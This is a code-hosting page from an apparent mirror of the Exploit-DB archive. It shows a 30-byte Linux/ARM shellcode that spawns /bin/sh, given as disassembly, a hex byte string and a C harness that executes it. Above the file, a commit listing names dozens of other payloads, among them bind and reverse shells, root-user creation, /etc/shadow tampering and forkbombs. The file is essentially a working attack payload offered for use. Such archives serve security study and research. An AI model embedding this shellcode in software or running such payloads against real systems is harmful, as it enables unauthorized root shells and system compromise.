bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/arm/shellcode/14097.c
Offensive Security b51e0f27d5 DB: 2016-07-17 
52 new exploits

Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) (38 bytes)

Linux/x86 - unlink(/etc/passwd) & exit() (35 bytes)
Linux i686 - pacman -S <package> (default package: backdoor) (64 bytes)
Linux i686 - pacman -R <package> (59 bytes)
Linux i686 - pacman -S <package> (default package: backdoor) (64 bytes)
Linux i686 - pacman -R <package> (59 bytes)
JITed stage-0 shellcode
JITed exec notepad Shellcode
Win32 - JITed stage-0 shellcode
Win32 - JITed exec notepad Shellcode
Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)
JITed egg-hunter stage-0 shellcode
Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes)
Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)
Windows - JITed egg-hunter stage-0 shellcode
Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes)

Linux/x86 - nc -lvve/bin/sh -p13377 shellcode
Linux/x86 - polymorphic forkbombe - (30 bytes)
Linux/x86 - forkbomb
Linux/x86 - polymorphic forkbombe (30 bytes)
Linux/x86 - forkbomb
Linux/x86_64 - execve(_/bin/sh_); shellcode (30 bytes)
Linux/x86 - sends _Phuck3d!_ to all terminals (60 bytes)
Linux/x86_64 - execve(_/bin/sh_); shellcode (30 bytes)
Linux/x86 - sends _Phuck3d!_ to all terminals (60 bytes)

Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) (57 bytes)
Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); (42 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes)
Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); (42 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes)
Linux/x86 - Disable randomize stack addresse (106 bytes)
Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83
Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes)
Linux/x86 - Disable randomize stack addresse (106 bytes)
Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83
Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes)

Linux/x86 - Shellcode Polymorphic - setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes)

Linux/x86 - kill all running process (11 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes)
Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes)
Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes)
Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes)
Linux/x86 - hard / unclean reboot (29 bytes)
Linux/x86 - hard / unclean reboot (33 bytes)
Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes)
Linux/x86 - hard / unclean reboot (29 bytes)
Linux/x86 - hard / unclean reboot (33 bytes)
Linux/x86 - chown root:root /bin/sh shellcode (48 bytes)
Linux/x86 - give all user root access when execute /bin/sh (45 bytes)
Linux/x86 - chown root:root /bin/sh shellcode (48 bytes)
Linux/x86 - give all user root access when execute /bin/sh (45 bytes)

Linux/ARM - setuid(0) & kill(-1_ SIGKILL) (28 bytes)

Linux/ARM - execve(_/bin/sh___/bin/sh__0) (30 bytes)

Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) (84 bytes)

Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)

Linux/ARM - Disable ASLR Security (102 bytes)

Linux/x86 - bind shell port 64533 (97 bytes)

Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)
Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)

Win32 - Write-to-file Shellcode

Linux/x86_64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) (49 bytes)

Linux/x86 - netcat bindshell port 8080 (75 bytes)

Shellcode Checksum Routine (18 bytes)
Win32 - Shellcode Checksum Routine (18 bytes)

Win32/XP SP3 (TR) - Add Admin Account Shellcode (127 bytes)
Win32/XP Pro SP3 (EN) 32-bit - add new local administrator (113 bytes)
Win32 - add new local administrator (326 bytes)
Win32/XP Pro SP3 (EN) 32-bit - add new local administrator (113 bytes)
Win32 - add new local administrator (326 bytes)

Win32 - speaking shellcode

Linux/x86 - netcat bindshell port 6666 (69 bytes)

DNS Reverse Download and Exec Shellcode
Windows - DNS Reverse Download and Exec Shellcode

Linux/x86_32 - ConnectBack with SSL connection (422 bytes)
Linux/x86 - ConnectBack with SSL connection (422 bytes)

Linux/x86 - egghunt shellcode (29 bytes)
Linux/MIPS - execve /bin/sh (48 bytes)
Linux/MIPS - add user(UID 0) with password (164 bytes)
Linux/MIPS - execve /bin/sh (48 bytes)
Linux/MIPS - add user(UID 0) with password (164 bytes)

Linux/x86 - execve(/bin/dash) (42 bytes)

Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh (378 bytes)

Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash (521 bytes)

Linux/x86 - rmdir (37 bytes)

Linux/MIPS - execve (36 bytes)

Windows XP x86-64 - Download & execute (Generator)

Linux/x86 - /etc/passwd Reader (58 bytes)

Linux - execve /bin/sh (23 bytes)
Linux/x86 - execve /bin/sh (23 bytes)

Linux/x86/x86_64 - reverse_tcp Shellcode
Linux x86 & x86_64 - reverse_tcp Shellcode
Linux/x86/x86_64 - tcp_bind Shellcode
Linux/x86/x86_64 - Read etc/passwd Shellcode
Linux x86 & x86_64 - tcp_bind Shellcode
Linux x86 & x86_64 - Read etc/passwd Shellcode

.Net Framework - Execute Native x86 Shellcode
Win32 .Net Framework - Execute Native x86 Shellcode
2016-07-17 05:07:02 +00:00

43 lines
1.1 KiB
C
Executable file
Raw Blame History

/*
Title: Linux/ARM - execve("/bin/sh","/bin/sh",0) - 30 bytes
Date: 2010-06-28
Tested: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
8054: e28f3001 add r3, pc, #1 ; 0x1
8058: e12fff13 bx r3
805c: 4678 mov r0, pc
805e: 300a adds r0, #10
8060: 9001 str r0, [sp, #4]
8062: a901 add r1, sp, #4
8064: 1a92 subs r2, r2, r2
8066: 270b movs r7, #11
8068: df01 svc 1
806a: 2f2f cmp r7, #47
806c: 6962 ldr r2, [r4, #20]
806e: 2f6e cmp r7, #110
8070: 6873 ldr r3, [r6, #4]
*/
#include <stdio.h>
char *SC = "\x01\x30\x8f\xe2"
"\x13\xff\x2f\xe1"
"\x78\x46\x0a\x30"
"\x01\x90\x01\xa9"
"\x92\x1a\x0b\x27"
"\x01\xdf\x2f\x2f"
"\x62\x69\x6e\x2f"
"\x73\x68";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}
Reference in a new issue View git blame Copy permalink